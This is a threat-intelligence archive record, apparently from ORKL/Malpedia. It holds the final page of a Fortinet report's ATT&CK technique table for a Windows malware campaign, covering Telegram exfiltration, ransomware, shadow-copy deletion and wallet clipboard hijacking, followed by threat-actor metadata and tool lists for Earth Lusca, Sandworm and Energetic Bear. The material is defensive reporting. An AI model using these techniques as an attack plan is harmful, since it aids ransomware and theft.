file-hosting\r\nservices\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 28 of 29\n\nProtocol: Web\r\nProtocols\r\nExfiltration T1041\r\nExfiltration\r\nOver C2\r\nChannel\r\nData sent directly through Telegram Bot APIs\r\nExfiltration T1567.002\r\nExfiltration\r\nOver Web\r\nService\r\nUse of third-party file hosting (e.g., GoFile) for large data\r\nsets\r\nImpact T1486\r\nData\r\nEncrypted for\r\nImpact\r\nHakuna Matata–derived ransomware encrypts user files\r\nImpact T1490\r\nInhibit System\r\nRecovery\r\nDeletion of backups, shadow copies, and disabling\r\nWindows Recovery\r\nImpact T1489 Service Stop Termination of services and processes prior to encryption\r\nImpact T1491.001\r\nDefacement:\r\nInternal\r\nWallpaper replacement and ransom messaging\r\nImpact T1499\r\nEndpoint\r\nDenial of\r\nService\r\nWinLocker deployment and file association hijacking\r\nImpact T1565.001\r\nStored Data\r\nManipulation\r\nClipboard hijacking to replace cryptocurrency wallet\r\naddresses\r\nSource: https://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 29 of 29",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign"
	],
	"report_names": [
		"inside-a-multi-stage-windows-malware-campaign"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434334,
	"ts_updated_at": 1775792229,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/77ac3aedd3c7b2af04248a1fa0dadec071c5ebd3.pdf",
		"text": "https://archive.orkl.eu/77ac3aedd3c7b2af04248a1fa0dadec071c5ebd3.txt",
		"img": "https://archive.orkl.eu/77ac3aedd3c7b2af04248a1fa0dadec071c5ebd3.jpg"
	}
}